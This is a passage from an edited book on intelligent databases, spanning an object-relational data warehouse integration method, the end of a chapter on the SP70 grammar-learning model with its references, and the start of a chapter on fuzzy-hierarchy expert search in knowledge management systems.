add specialized attributes {E}, {F} or {E, F} to each sub-dimension. Step 2: For three complex types, namely Type 1, Type 2 and Type n with elements {A, B, D, E, F} are required analytical information. Type 1 is the base type where Type 2 and Type n are of the extension based Type 1. Element {A, B} in Type 1 are mapped to attributes {A, B} in Dimension 2. Extension base types Type 1 is mapped to sub-type of Value31; whereas Type n is mapped to Value32 respectively. An element such as {E} or {F} is mapped to its own class where appropriate. Example: Conceptual degree dimension, in phase (i) Figure 4 earlier, is now presented in
Figure 11. Specifying data sources in dimension using inheritance type
where SubjectID is primary key (OID) Relational Data •
Adding Attributes to Inheritance Dimension: Figure 11 shows that relational data and semantic network diagram Attrs{A, B, D, E, F} are simple data types; Attrs{D} is a type attribute; generalized attributes{A,B} specialized Attrs{E, F}; ComplexType (Type 1, Type 2, Type 3…Type n}. Adding attributes to an inheritance dimension consists of two steps:
Step 1: For a relational data source table that has attributes {A, B, D, E, F, E}, which are required for analytical information. Dimension 2 is a super-type, which has one or more sub-dimensions. Each sub-dimension has one or more specialized attributes. To complete an integration of inheritance dimension: add generalized attributes{A,B} to super-type Dimension 2; map a value group of type attribute {D} to a sub-dimension.;
Figure 12 to add appropriate attributes and data structures in order to complete the integration of the degree dimension.
Figure 12. Adding/mapping attribute data to the conceptual integrated degree dimension
Step 1: For a relational degree source table that has attributes {DegreeID, Degreename, Degreetype, Area, Major}, which are required for analytical information, DegreeDimension is a super-type that has two sub-dimensions, Research and Coursework. Each sub-dimension has one or more specialized attributes, such as {Area} or {Major}. To complete the integration of the inheritance DegreeDimension: add the generalized attributes {DegreeID, Degreename} to DegreeDimension; map the Research value of DegreeType to the Research sub-type and the Coursework value of DegreeType to the Coursework sub-type. Area is the attribute that specializes the research degree, and Major
is the attribute that specializes the coursework degree. Thus, attribute {Area} is added to the Research sub-type and attribute {Major} is added to the Coursework sub-type.
Step 2: For three complex types, DegreeType, ResearchType, and CourseworkType, with elements {DegreeID, Degreename, Area, Major}, DegreeType is the base type and ResearchType and CourseworkType are extensions of the base DegreeType. Elements {DegreeID, Degreename} in DegreeType are mapped to attributes {DegreeID, Degreename} in DegreeDimension. The Research complexType, an extension of the base DegreeType, is mapped to the Research sub-type, whereas the Coursework complexType is mapped to the Coursework sub-type. The elements {Area} and {Major} are mapped to the Research and Coursework sub-types respectively. A complete degree integration forms classes and attributes as follows:
DegreeDimension {DegreeID, Degreename}
Research {Area}
Coursework {Major}
where DegreeID is the primary key (OID)
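As a hedged illustration of this inheritance mapping, the sketch below models DegreeDimension as a super-type with Research and Coursework sub-types selected by the Degreetype value. The Python class layout and the sample row are assumptions for illustration, not the chapter's actual object-relational definition.

from dataclasses import dataclass

@dataclass
class DegreeDimension:
    degree_id: str        # OID / primary key, generalized attribute
    degree_name: str      # generalized attribute

@dataclass
class Research(DegreeDimension):
    area: str             # specialized attribute of research degrees

@dataclass
class Coursework(DegreeDimension):
    major: str            # specialized attribute of coursework degrees

def map_degree_row(row: dict) -> DegreeDimension:
    """Map one row {DegreeID, Degreename, Degreetype, Area, Major} to a sub-type."""
    if row["Degreetype"] == "Research":
        return Research(row["DegreeID"], row["Degreename"], area=row["Area"])
    return Coursework(row["DegreeID"], row["Degreename"], major=row["Major"])

# Illustrative row, not taken from the chapter's data:
print(map_degree_row({"DegreeID": "D1", "Degreename": "M.Sc.",
                      "Degreetype": "Research", "Area": "SWE", "Major": None}))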
•	Adding Attributes to an Aggregation Dimension: The non-shareable existence-dependent type is applied to a problem where the "parts" are dependent on the "whole": when the whole is removed, its parts are also removed. With reference to Figure 13, Attrs {A, B, C, D, E, F} are simple data types and the complex types are Type 1 and Type 2. Adding attributes to an aggregation dimension consists of two steps:
Step 1: For relational data table 1 and relational data table 2, which have attributes {A, B, D, E} that are required for analytical information, relational data table 1 has a one-to-many relationship with relational data table 2, and relational data table 2 is composed of relational data table 1. Thus,
Figure 13. Specifying data sources in dimension using the non-shareable existence-dependent type
relational data table 1 is a parent of relational data table 2.
Step 2: For two complex types, namely Type 1 and Type 2, with elements {A, B} and {E, F}: if Type 2 is composed by Type 1, then Type 1 is mapped to Dimension 3 and elements {A, B} in Type 1 are added as attributes {A, B} of Dimension 3. Type 2 is also mapped to the Component of Dimension 3, and elements {E, D} are added to the Component of Dimension 3. Note that the element names in Type 2 do not match the element names in the Component; for the time being, it is presumed that element {E} is matched with element {E} and element {D} is matched with element {F}.
Example: The conceptual faculty dimension, from section (A) in Figure 6 earlier, is now presented in Figure 14 to add appropriate attributes and data structures in order to complete the integration of the faculty dimension.
Step 1: For the relational faculty data source table and relational school data table, which have attributes {FacultyID, Facultyname} and {SchoolID, Schoolname} that are required for analytical information, the relational Faculty table has a one-to-many relationship with the relational School table, and the relational School table is composed of the Faculty table. Thus, the Faculty table is a parent
Figure 14. Adding/mapping attribute data to the conceptual faculty dimension
of the School table. FacultyDimension and SchoolComponent have a part-of relationship, in which FacultyDimension is the parent of SchoolComponent. The SchoolComponent is a non-shareable part, which means that when a FacultyDimension is removed, its SchoolComponents are also removed. To complete the integration of FacultyDimension: add the attributes {FacultyID, Facultyname} in the relational Faculty table to FacultyDimension; add the attributes {SchoolID, Schoolname} in the relational School table to the corresponding SchoolComponent.
Step 2: For two complex types, namely the Faculty type and the School type, with elements {FacultyID, Facultyname} and {SchoolID, Schoolname}: if the School type is composed by the Faculty type, then the Faculty type is mapped to FacultyDimension, and the elements {FacultyID, Facultyname} in the Faculty type are added as attributes {FacultyID, Facultyname} in FacultyDimension. The School type is also mapped to SchoolComponent, and the elements {SchoolID, Schoolname} in the School type are added to SchoolComponent. A complete faculty integration forms classes and attributes as follows:
FacultyDimension {FacultyID, Facultyname}
SchoolComponent {SchoolID, Schoolname}
where FacultyID and SchoolID are the primary keys (OIDs)
The shareable existence-independent type is applied where parts are independent of the whole: when the "whole" is removed, the parts still remain. The conceptual time dimension in Figure 7 is now shown with the process of specifying/mapping attributes in Figure 15. A complete time integration forms the following classes and attributes:
TimeDimension {TimeID, Description}
Semester {SemesterID, Description}
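A minimal sketch of the non-shareable existence-dependent aggregation is given below, assuming an in-memory representation in which SchoolComponent objects are reachable only through their owning FacultyDimension. The class names follow the text; the sample values are illustrative.

from dataclasses import dataclass, field
from typing import List

@dataclass
class SchoolComponent:
    school_id: str
    school_name: str

@dataclass
class FacultyDimension:
    faculty_id: str
    faculty_name: str
    schools: List[SchoolComponent] = field(default_factory=list)  # part-of, 1..*

faculties = {
    "CSE": FacultyDimension("CSE", "Comp. Sci.",
                            [SchoolComponent("CSM", "Comp. & Math")]),
}

# Removing the whole removes the non-shareable parts with it: once the faculty
# entry is dropped, nothing else holds a reference to its school components.
del faculties["CSE"]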
Figure 15. Adding/mapping attribute data to the conceptual time dimension
And this multiple alignment is processed to make a copy of each coherent sequence of matched symbols in row 0 and each coherent sequence of unmatched symbols in row 0 and in row 1. Each such copy is given one or two identification symbols and brackets at each end. In addition, the program creates an "abstract" pattern as described as follows. The result of this processing is a set of patterns like these:
< %2 t h e >
< %3 r a b b i t >
< %4 0 j a c k >
< %4 1 w h i t e >
< %5 < %2 > < %4 > < %3 > >
and these patterns are added to the repository of Old patterns. Notice how, in this example, the first four patterns that are isolated are words (in English) and how the fifth pattern records the sequence of matched and unmatched patterns by means of their identification symbols, “%2”, “%4” and “%3”. Notice also how “< %4 0 j a c k >” and “< %4 1 w h i t e >” both contain the identification symbol “%4” which means that they are alternatives within the larger context represented by the fifth pattern. The identification symbols “0” and “1” in those two patterns provide the means of distinguishing between them. This simple example gives the flavour of how, in the tradition of structuralist linguistics (see, for example, Harris, 1951; Fries, 1952), the SP70 model is able to isolate significant structures such as words in natural language and distributionally-equivalent classes of words such as the nascent category of “adjective” represented by the symbol “%4”.
But Phase 1 of processing by SP70 is not sufficient in itself to isolate things like words and word classes in a tidy manner. A large proportion of the patterns that are generated by the system in this phase of processing are very clearly “wrong”. There is a large amount of rubbish mixed up with the patterns that we would naturally regard as the “correct” way to describe the raw data. It is Phase 2 of SP70 that sorts the wheat from the chaff, extracting those patterns that are useful for the economical encoding of the original New patterns and discarding the rest. The process is a fairly straightforward application of the principle of “hill climbing”, building a set of one or more alternative grammars in stages and using the principles of minimum length encoding to evaluate alternative grammars at each stage so that “good” ones are retained and “bad” ones are discarded. Given a set of simple sentences, SP70 is able to create alternative grammars for the sentences and the best of these grammars (in terms of minimum length encoding) are also grammars that appear subjectively to be “plausible” or “correct”, both in terms of the words that are isolated and in terms of the classes of distributionally-equivalent words that are identified. These results are an encouraging sign that the concepts are developing along the right lines but the program is less successful with examples that are more complex. In particular, while the program is able to isolate low-level structures like words and abstract patterns that describe the overall structure of a sentence, it is not able to isolate intermediate levels of structure such as phrases or clauses. More work will be needed to overcome this problem and other weaknesses in the model as it stands now.
Minimum Length Encoding
With regard to principles of minimum length encoding, the program demonstrates clearly how, in Phase 2, it achieves levels of compression that
increase progressively as it searches for grammars that provide the best overall description of the New patterns. This can be seen in Figure 17 which shows measurements made by SP70 when it successfully discovered a plausible grammar for eight simple sentences that were presented to the program as eight New patterns. The X axis shows the succession of New patterns that are processed in Phase 2, and the Y scale on the left shows cumulative sizes (in 10,000 of bits) of the New patterns in their raw state (“O”), the size of the best grammar found at each stage (“G”), the size of the raw data after it has been encoded in terms of the best grammar (“E”), and the sum of G and E at each stage, represented as “T”. The plot marked T/O is a measure of the compression achieved at each stage (on the right Y scale), showing how, in accordance with principles of minimum length encoding, (G + E) decreases progressively relative to the size of the raw data.
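The bookkeeping behind these measurements can be illustrated with a toy sketch (this is not SP70 code): candidate grammars are scored by T = G + E and compared against the raw size O, with T/O as the compression measure. The sizes used below are made-up numbers, not values from Figure 17.

def total_description_length(grammar_bits: float, encoding_bits: float) -> float:
    """T = G + E: size of the grammar plus size of the data encoded with it."""
    return grammar_bits + encoding_bits

def compression_ratio(grammar_bits: float, encoding_bits: float,
                      raw_bits: float) -> float:
    """T/O: how small (G + E) is relative to the raw, unencoded data."""
    return total_description_length(grammar_bits, encoding_bits) / raw_bits

# Hypothetical candidate grammars for the same raw data of 40,000 bits:
candidates = {"grammar_1": (9_000.0, 22_000.0), "grammar_2": (15_000.0, 12_000.0)}
raw = 40_000.0
best = min(candidates, key=lambda g: total_description_length(*candidates[g]))
print(best, compression_ratio(*candidates[best], raw))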
Learning in an SP Intelligent Database Ordinary database management systems do not learn as that term is normally understood. They are simply supplied with knowledge by manual input or, sometimes, by the automatic collection of data from some source. Although acquisition of knowledge is one of the elements of learning, and adding knowledge to a database may be seen as a primitive form of learning, something more is expected from an intelligent database if it is to learn in the “intelligent” manner that we associate with human learning. The key ingredient that is missing from ordinary databases is the ability to organise knowledge in ways that are “meaningful” or “useful”. It should, for example, be possible to supply the database with the kind of data that might be gathered by a botanist or zoologist on some field trip or expedition and then the database would organise that knowledge automatically into a taxonomy of classes and subclasses, with associ-
Figure 17. Measurements made by SP70 (described in the text) as the program derives a plausible grammar from eight sentences presented to the program as eight New patterns
* This figure is reproduced from Wolff (2006, p. 286), with permission
ated hierarchies of parts and subparts. It should be possible to analyze the kind of raw data that a company might have stored about its customers and derive rules that may be useful in marketing, such as associations between particular post codes and high-spending customers. Of course, taxonomies can be derived by the many versions of cluster analysis, and the derivation of rules from raw data has been the subject of intensive investigation in the field of “data mining”. But, as indicated, the SP program of research differs from research that is dedicated purely to one facet of intelligence because it aims to develop a framework that integrates learning with several other aspects of intelligence. We have seen how the unsupervised learning of a grammar for a sample of natural language may be achieved within the SP framework but this is not exactly the same as learning class hierarchies, part-whole hierarchies or rules in an intelligent database. However, there are close parallels amongst these forms of learning:
•	Part of the process of developing a class hierarchy or a set of rules is the process of identifying the elements of those structures. This is similar to the way in which a grammar-induction program must abstract words, phrases, and other elements of grammatical structure.
•	Likewise, there is a need in all these kinds of learning to identify hierarchies of parts and sub-parts.
•	And the learning of a hierarchy of classes and sub-classes is very similar to the learning of grammatical rules at varying levels of abstraction, from kinds of "sentence" at the highest level to words, morphemes, phonemes, or allophones at the lower levels of grammatical structure.
In the development of the SP70 model, it is anticipated that if or when the system can be developed to a stage where it has a robust capability for the unsupervised learning of realistic
grammars, it may then be applied with little or no modification to the learning of class hierarchies, part-whole hierarchies, and associations and rules of the kind used in expert systems. With these kinds of capabilities, a mature version of the SP system should be able to automate such processes as organising raw data into meaningful structures, reorganizing badly-structured data into well-structured knowledge, and discovering associations and rules that may later be applied in probabilistic reasoning about the stored knowledge. Since class hierarchies and part-whole hierarchies are center-stage in object-oriented software design, object-oriented databases, and in the entity-relationship approach to software engineering, it is anticipated that the mature SP system will provide for the automation or semi-automation of these kinds of application.
CONCLUSION The SP system is still being developed and there are still issues to be resolved. However, current models demonstrate clearly that there is a good prospect of achieving the overall goal of this research program — to develop a single, relatively simple framework for a range of different aspects of intelligence. In this chapter, we have reviewed with examples, some aspects of intelligence that may be provided by an intelligent database founded on the SP concepts. We have seen how the system supports the kind of “fuzzy” pattern recognition that is so prominent in human perception (including pattern recognition through multiple levels of abstraction and the ability to recognize things despite errors of omission, commission, and substitution), how it supports best-match retrieval of information and “semantic” forms of information retrieval, how the system may perform various kinds of reasoning, both classical and probabilistic (including probabilistic deduction, abduc-
tion, and nonmonotonic reasoning), how the SP system can support the analysis and production of natural language (so that it may facilitate the provision of a natural language front end to an intelligent database) and how, with some further development, the system is likely to support the kind of unsupervised learning that one might hope to see in any database system that aspires to be intelligent. What has been described in this chapter is an introduction to the SP system and what it can do. A wider coverage, with more detail, may be found in Wolff (2006). I hope that readers will explore the concepts in more depth and contribute their own research and thinking to the further development of these ideas.
REFERENCES
Bertino, E., Catania, B., & Zarri, G. P. (2001). Intelligent database systems. Harlow: Addison-Wesley.
Brent, M. R. (1999). An efficient, probabilistically sound algorithm for segmentation and word discovery. Machine Learning, 34, 1-3.
Cover, T. M., & Thomas, J. A. (1991). Elements of information theory. New York: John Wiley.
Bray, T., Paoli, J., Sperberg-McQueen, C. M., Maler, E., & Yergeau, F. (2004). Extensible Markup Language (XML) 1.0 (3rd ed.). World Wide Web Consortium. Retrieved from http://www.w3.org/TR/2004/REC-xml-20040204/
Fries, C. C. (1952). The structure of English. New York: Harcourt, Brace & World.
Gazdar, G., & Mellish, C. (1989). Natural language processing in Prolog. Wokingham: Addison-Wesley.
Gold, M. (1967). Language identification in the limit. Information & Control, 10, 447-474.
Harris, Z. S. (1951). Methods in structural linguistics. Chicago: University of Chicago Press.
Li, M., & Vitányi, P. (1997). An introduction to Kolmogorov complexity and its applications. New York: Springer-Verlag.
Nevill-Manning, C. G., & Witten, I. H. (1997). Compression and explanation using hierarchical grammars. Computer Journal, 40(2/3), 103-116.
Pereira, F. C. N., & Warren, D. H. D. (1980). Definite clause grammars for language analysis — A survey of the formalism and a comparison with augmented transition networks. Artificial Intelligence, 13, 231-278.
Solomonoff, R. J. (1964). A formal theory of inductive inference. Parts I and II. Information and Control, 7, 1-22; 224-254.
Solomonoff, R. J. (1997). The discovery of algorithmic probability. Journal of Computer and System Sciences, 55(1), 73-88.
Storer, J. A. (1988). Data compression: Methods and theory. Rockville, MD: Computer Science Press.
Wolff, J. G. (1977). The discovery of segments in natural language. British Journal of Psychology, 68, 97-106. Retrieved from www.cognitionresearch.org.uk/lang_learn.html#wolff_1977
Wolff, J. G. (1980). Language acquisition and the discovery of phrase structure. Language & Speech, 23, 255-269. Retrieved from www.cognitionresearch.org.uk/lang_learn.html#wolff_1980
Wolff, J. G. (1988). Learning syntax and meanings through optimization and distributional analysis. In Y. Levy, I. M. Schlesinger, & M. D. S. Braine (Eds.), Categories and processes in language acquisition (pp. 179-215). Hillsdale, NJ: Lawrence Erlbaum. Retrieved from www.cognitionresearch.org.uk/lang_learn.html#wolff_1988
Wolff, J. G. (1999). Probabilistic reasoning as information compression by multiple alignment, unification and search: An introduction and overview. Journal of Universal Computer Science, 5(7), 418-462. Retrieved from http://arxiv.org/abs/cs.AI/0307010
Wolff, J. G. (2000). Syntax, parsing and production of natural language in a framework of information compression by multiple alignment, unification and search. Journal of Universal Computer Science, 6(8), 781-829. Retrieved from http://arxiv.org/abs/cs.AI/0307014
Wolff, J. G. (2003a). Information compression by multiple alignment, unification and search as a unifying principle in computing and cognition. Artificial Intelligence Review, 19(3), 193-230. Retrieved from http://arxiv.org/abs/cs.AI/0307025
Wolff, J. G. (2003b). Unsupervised grammar induction in a framework of information compression by multiple alignment, unification and search. In C. de la Higuera, P. Adriaans, M. van Zaanen, & J. Oncina (Eds.), Proceedings of the Workshop and Tutorial on Learning Context-Free Grammars (pp. 113-124). Retrieved from http://arxiv.org/abs/cs.AI/0311045
Wolff, J. G. (2006). Unifying computing and compression: The SP theory and its applications (Ebook ed.). Menai Bridge: CognitionResearch.org.uk. Retrieved from http://www.cognitionresearch.org.uk/sp.htm#BOOK
Wolff, J. G. (forthcoming a). Medical diagnosis as pattern recognition in a framework of information compression by multiple alignment, unification and search. To appear in Decision Support Systems. Available online from May 17, 2005. Retrieved from http://www.cognitionresearch.org.uk/papers/applications/medical/medical_applications.htm
Wolff, J. G. (forthcoming b). Towards an intelligent database system founded on the SP theory
of computing and cognition. To appear in Data & Knowledge Engineering. Retrieved from http://www.cognitionresearch.org.uk/papers/dbir/dbir.htm
ENDNOTES
1. The phrase minimum length encoding is an umbrella term for the closely-related concepts of "minimum message length" encoding and "minimum description length" encoding. These terms relate to the process of creating or discovering a grammar or other form of knowledge that will describe a given body of raw data. Solomonoff (1964, 1997) realized that there is an infinite range of alternative grammars that may describe any given body of raw data. He proposed that, to discriminate amongst these alternatives, one should try to minimise (G + E), where G is the size of the grammar (in bits of information) and E is the size of the body of raw data (in bits) when it has been encoded in terms of the grammar. Minimising (G + E) is equivalent to compressing the raw data as much as possible, where the compressed representation includes both the code system that is used and the encoding of the raw data. These principles may be applied to any kind of knowledge, not just "grammars" in a narrow sense of that term.
2. It is clear that, when diagnosis is done by a doctor, vet, or plant specialist, causal reasoning also has an important role. Nevertheless, much can be achieved by viewing the diagnostic process purely as a form of pattern recognition.
3. In the absence of any number at the end of each pattern representing the relative frequency of the pattern, SP62 assumes a default value of 1.
4. The main difference between SP62 and SP61 is that the former allows the use of one, two, or more new patterns (treated as an unordered set as described in the text) whereas the latter allows the use of only one new pattern.
5. Compared with multiple alignments shown earlier, this one has been rotated by 90˚, simply because it takes up less space on the page. When multiple alignments are shown in this way, the new pattern (or patterns) are always in row 0 and the old patterns appear in the other rows, one pattern per row. The order of the old patterns across the rows is entirely arbitrary, without special significance.
This work was previously published in Intelligent Databases: Technologies and Applications, edited by Z. Ma, pp. 197-237, copyright 2007 by Idea Group Publishing (an imprint of IGI Global).
Chapter 2.18
Intelligent Search for Experts Using Fuzzy Abstraction Hierarchy in Knowledge Management Systems
Kun-Woo Yang, Keimyung University, South Korea
Soon-Young Huh, KAIST Business School, South Korea
ABSTRACT In knowledge management systems (KMS), managing explicit knowledge is comparatively easy using information technology such as databases. However, tacit knowledge, usually possessed by human experts in unstructured forms such as know-how and experiences, is hard to systemize. Recent research has shown that it is more effective to provide search mechanisms for experts than to directly search for specific knowledge itself in KMS to pinpoint experts with needed knowledge in the organizations so that users can acquire the knowledge from the found experts. In this article, we propose an intelligent search framework to provide search capabilities for experts who not only match search conditions exactly but also
belong to the similar or related subject fields according to the user’s needs. In enabling intelligent searches for experts, the Fuzzy Abstraction Hierarchy (FAH) framework has been adopted. Based on FAH, searching for experts with similar or related expertise is facilitated using the subject field hierarchy defined in the system. While adopting FAH, a text categorization approach based on Vector Space Model is also utilized to overcome the limitation of the original FAH framework. To test applicability and practicality of the proposed framework, the prototype system, “Knowledge Portal for Researchers in Science and Technology” sponsored by the Ministry of Science and Technology (MOST) of Korea, has been developed.
INTRODUCTION Managing tacit knowledge, which is usually embedded in the operating procedures as routines or standards in the organizations, has been considered as important as or even more important than managing its counterpart, explicit knowledge, to stay competitive in the business world (Hansen, Nohria, & Tierney, 1999; Kakabadse, Kouzmin & Kakabadse, 2001; King, 2006; Nonaka & Takeuchi, 1995). Therefore, the need for the effective management of tacit knowledge has been taking up much of the research time and effort by knowledge management system (KMS) researchers and practitioners (Kwan & Cheung, 2006; Liebowitz, 2001; Nah, Siau & Tian, 2005; Rus & Lindvall, 2002; Siau, 2000; Zack, 1999). However, the results of the research effort to develop an effective and efficient way to store, retrieve, and share tacit knowledge has not been successful enough to be widely accepted in practice due to its limited applicability and inflexibility. Examples of the research in this direction include best practice systems in which organizational best practices are stored in the database for later uses (O’Dell & Grayson, 1998; Sorensen & Snis, 2001). In addition, design rationale systems can be another example, through which design rationale is represented and maintained (Buckingham-Shum & Hammond, 1994; Conklin & Yakemovic, 1991; Hu, Pang, Pang, Atwood, Sun, & Regli, 2000). However, since the former requires context-specific knowledge for someone to fully take advantage, it has not been actively utilized in a real business environment. Also, due to its limited applicability and domain dependency, a single design rationale system cannot be used across many different fields. In the meantime, other research in manipulating tacit knowledge proposes providing appropriate ways to search for individual experts in the organizations rather than deliberately codifying their knowledge (Alavi & Leidner, 2001; Desouza, 2003). This search approach for experts can be applied to almost any
domain due to its generality while avoiding the possible degradation of the knowledge resulted from the deliberate separation of it from the holders (Augier & Vendelo, 1999; Desouza, 2003; Kreiner, 2002). Following this type of research, some of commercial KM tools started to include search functionality for experts in their suites (Handysoft, 2003; Microsoft, 2004; Verity, 2004). To enable the search functionality for experts, the experts themselves in the organization should be identified in terms of the type of expertise they possess. There can be two approaches for compiling this expertise information. One is a manual registration approach which requires the system administrator or the expert to put the expertise information into the system. The other is to automate the expert profiling process based on the knowledge activities of each expert in KMS. Most of commercial KM products with search functionality for experts adopt the former approach which requires constant human intervention to keep expert profile information current. The maintenance cost of profile information is not the only disadvantage of this approach. Other shortcomings of manual profiling include (1) the difficulty of reflecting the changes in each subject field such as new concepts or terminology that continue to evolve, (2) the difficulty of maintaining objectivity and consistency in classifying experts or measuring the level of expertise by people involving the classifying task, either the experts themselves or system administrators, and (3) the lack of expertise in classifying all the experts in many different subject fields if the classifying task is done by one person. Considering all those limitations of the manual profiling approach, it is needed to have an efficient as well as automatic way to build and maintain those expert profiles using an objective classifying methodology. Analyzing the knowledge artifacts registered by experts such as uploaded documents or posted articles on bulletin boards and classifying those artifacts into predefined subject fields are the most feasible ways to automate the expert profiling
process. This is because the registered knowledge artifacts can be considered to represent the expertise of the users registering them to a certain extent and also because from a system’s point of view, they are the only contents available for classification, which result from the interaction between KMS and its users. Since most of registered knowledge artifacts have textual forms such as plain text or document files, a text categorization technique is the most appropriate solution for classifying them without any manual human intervention (Baeza-Yates & Riberio-Neto, 1999; Belkin & Croft, 1992; Gentili, Marinilli, Micarelli, & Sciarrone, 2001; Ko, Park & Seo, 2004; Kwon & Lee, 2003; Lam, Ruiz & Srinivasan, 1999; Lertnattee & Theeramunkong, 2004; Ruiz & Srinivasan, 2002; Tokunaga & Iwayama, 1994). Therefore in this article, we apply a text categorization technique to classify knowledge artifacts registered by KMS users in building their profiles. Once the expert profiling process is completed and all the expert profiles are consolidated into the expert profile database, it is possible for users to perform searches for experts using the search mechanisms provided by the system. However, conventional query processing can only provide exact answers to a user’s queries if and only if all the conditions of the queries are satisfied. Therefore, using the conventional query processing approach, the system cannot provide any useful information if there are not any experts with specific knowledge in need. To avoid this exact matching requirement of conventional query system and increase the user’s search satisfaction, several approaches are researched and proposed, such as nearest neighbor searches (Chan, 1998; Dang, Kung & Wagner, 2002) and preference searches (Chomicki, 2004; Klein & Konig-Ries, 2004). While nearest neighbor searches deal with mostly numeric conditions to provide best matches, preference searches provide a generic way to express concepts like importance or relevance. Similar to the preference search
approach, there are cooperative query answering mechanisms (Braga, Laender & Ramos, 2000; Cai, Cercone & Han, 1993; Huh & Lee, 2001; Huh, Moon & Lee, 2000), which were developed to give flexible query results through interactions with users based on predefined conceptual relationship among domain knowledge. To increase the user’s satisfaction in performing searches for experts by providing experts in similar or related subject fields, who might be the best candidates available to provide solutions for problems on hand, we utilize a cooperative query answering approach equipped with a hierarchical knowledge representation scheme. The subject fields of experts, in which each expert has specialized expertise or knowledge, can be represented as a hierarchical structure since more specific or detailed subject fields can be grouped into more generalized or higher level subject concepts. This hierarchical structure of knowledge or subject fields is appropriate to be utilized to classify experts systematically according to the expertise they have. In this article, we adopt Fuzzy Abstraction Hierarchy (FAH) (Moon & Huh, 2003), which incorporates fuzzy relations and operations to calculate similarity measures among data values as well as provides cooperative query answering capabilities. By adopting FAH, KMS users can be given an ordered list of approximate expert candidates to their search queries for experts based on the similarity measures calculated using fuzzy relations. This article is organized as follows: In the second section, the FAH framework is briefly introduced. The third section describes the structure of expertise we define in this article to show how to measure each expert’s level of expertise in a certain subject field and explains the training process of the automatic expert classifier, through which initial similarity measures for FAH are derived. The fourth section introduces the intelligent search process for experts based on FAH providing flexible search results according to the user’s preferences. Also, the prototype system we
implemented to test the practicality of the proposed framework is presented in this section. Finally, the fifth section concludes the article.
FUZZY ABSTRACTION HIERARCHY The ultimate purpose of automating expert profiling and providing a search mechanism for needed experts is to return satisfactory answers to a KMS user’s queries for experts he or she wants. When the user’s query does not return sufficient answers using the exact match mechanism, providing approximate answers with similar characteristics is one way to improve user satisfaction on the search results in addition to finding the exact matches to the search criteria. In this capacity, when a specific KMS system does not have expert profiles with specific expertise that a user wants to find or the query result is not satisfactory enough, more search satisfaction can be achieved if the system is able to provide an additional search capability to find experts with similar or related expertise by improving the query processor of the system. To facilitate searches for similar experts, we adopt FAH in this article. FAH is a type of ontology in a sense that it is a hierarchically structured set of terms for describing a domain. Ontologies have been actively researched and proposed as an important knowledge representation framework (Corcho, Fernandez-Lopez & Gomez-Perez, 2003; Jurisica, Mylopoulos & Yu, 2004; Sugumaran & Storey, 2002). FAH, however, can be distinguished from a general ontology because not only does it represents semantic distances among concepts using fuzzy numbers, but also it is equipped with the intelligent query processing capability to provide approximate answers to user queries. FAH has been developed to remedy the shortcomings of conventional query processing that does not possess any intelligence to cooperate with users in providing flexible query results according
to the user’s needs unless complex and strict query language syntax is followed. It analyzes the intent of a query and transforms it into a new query of either wider scope by relaxing the original query conditions or narrower scope by tightening them. FAH has a couple of advantages over other data abstraction methods in applying to searches for experts. First, since FAH represents the semantic relationships among data values based on data abstraction as a hierarchy, it is the most appropriate and applicable representation framework for expert categorization. This is because expertise has its own hierarchical structure due to its categorical trait. Second, based on the mechanism proposed in FAH, we can calculate and represent the exact level of similarity among values, through which other valuable information such as fitness scores or similarity measures between search results can be given. Figure 1 shows an example of FAH defined for research fields and the following definitions are needed to understand its hierarchical structure. First, the abstract field is called n-level abstract of a specific field according to the difference (n) between the abstraction levels of the two fields. Second, among the fields existing on the same abstraction level, n-level siblings are composed of fields whose nearest same abstract field is an n-level abstract one. Figure 1 illustrates the conceptual relationships defined above among subject fields. In the figure, it is shown that “Natural Science” is a 1-level abstract field of the three fields of “Mathematics,” “Physics,” and “Physical Chemistry.” By the same token, “Engineering” is a 1-level abstract field of “Computer Science” and “Mechanical Engineering.” Also, there exists a 1-level sibling relationship between “Mathematics” and “Physics” because both fields share the same 1-level abstract field of “Natural Science.” In this capacity, “Physical Chemistry” and “Computer Science” are 2-level siblings since a 2-level abstract field is the nearest same abstract field that both fields have. In ad-
Figure 1. Example of fuzzy abstraction hierarchy
dition, the number given for each 1-level sibling pair is the similarity measure assigned for those siblings. Providing a wider range of approximate answers by relaxing search conditions requires an expert’s knowledge of the underlying data semantics; for example, similarity measures among data values. Thus, a system administrator or an experienced expert should evaluate, determine, and finally assign the values for the initial similarity measure among sibling nodes sharing the first-level parents as shown in Figure 1. Also, constant maintenance effort is required whenever needs for updating those similarity measures arise. This type of manual assignment of similarity measures is the major limitation of FAH and has the following problems. First, the similarity values assigned for pairs of fields in the hierarchy are fully dependent on the person who performs evaluation and value assignment and, therefore, the values are rather subjective. Second, it is not possible for one individual to assign all the similarity measures correctly if the hierarchy is large, resulting in the large number
of data pairs requiring initial value assignment because, most of time, one person cannot be knowledgeable about all the defined fields in the hierarchy. Third, subject fields themselves keep changing. In other words, as time goes by, the similarity measure between two fields can be different from what it was before due to many reasons. Whenever this kind of update requirement arises, human intervention, which costs time and money, should be involved if the manual assignment process is adopted. Considering these limitations, there is enough room for developing a more efficient as well as more cost-effective similarity value evaluation and assignment methodology. Thus, an automatic method of assessing the similarity measures is needed for effective knowledge maintenance. A text categorization approach can be applied to automatically derive the similarity measures among the subject fields by analyzing knowledge contents belonging to each subject field, which is explained later in the automatic expert classifier training section.
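A minimal Python sketch of the hierarchy in Figure 1 is given below, assuming a simple parent map. The field names follow the text, but the similarity values shown are placeholders rather than the figure's assigned measures, and the helper functions are illustrative, not part of the FAH framework's own implementation.

# Abstraction hierarchy from Figure 1: each field points to its 1-level abstract.
parent = {
    "Mathematics": "Natural Science", "Physics": "Natural Science",
    "Physical Chemistry": "Natural Science",
    "Computer Science": "Engineering", "Mechanical Engineering": "Engineering",
    "Natural Science": "Research Field", "Engineering": "Research Field",
}

# Initial similarity measures are only assigned between 1-level siblings
# (fields sharing their immediate parent); the values here are illustrative.
sibling_similarity = {
    frozenset({"Mathematics", "Physics"}): 0.6,
    frozenset({"Computer Science", "Mechanical Engineering"}): 0.8,
}

def ancestors(field: str) -> list:
    """Chain of abstract fields above a field, nearest first."""
    chain = []
    while field in parent:
        field = parent[field]
        chain.append(field)
    return chain

def sibling_level(f1: str, f2: str) -> int:
    """n such that f1 and f2 are n-level siblings (nearest shared abstract is n levels up)."""
    a1, a2 = ancestors(f1), ancestors(f2)
    for n, anc in enumerate(a1, start=1):
        if anc in a2:
            return n
    raise ValueError("fields are not in the same hierarchy")

print(sibling_level("Mathematics", "Physics"))                  # 1
print(sibling_level("Physical Chemistry", "Computer Science"))  # 2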
BUILDING AN EXPERT PROFILE DATABASE
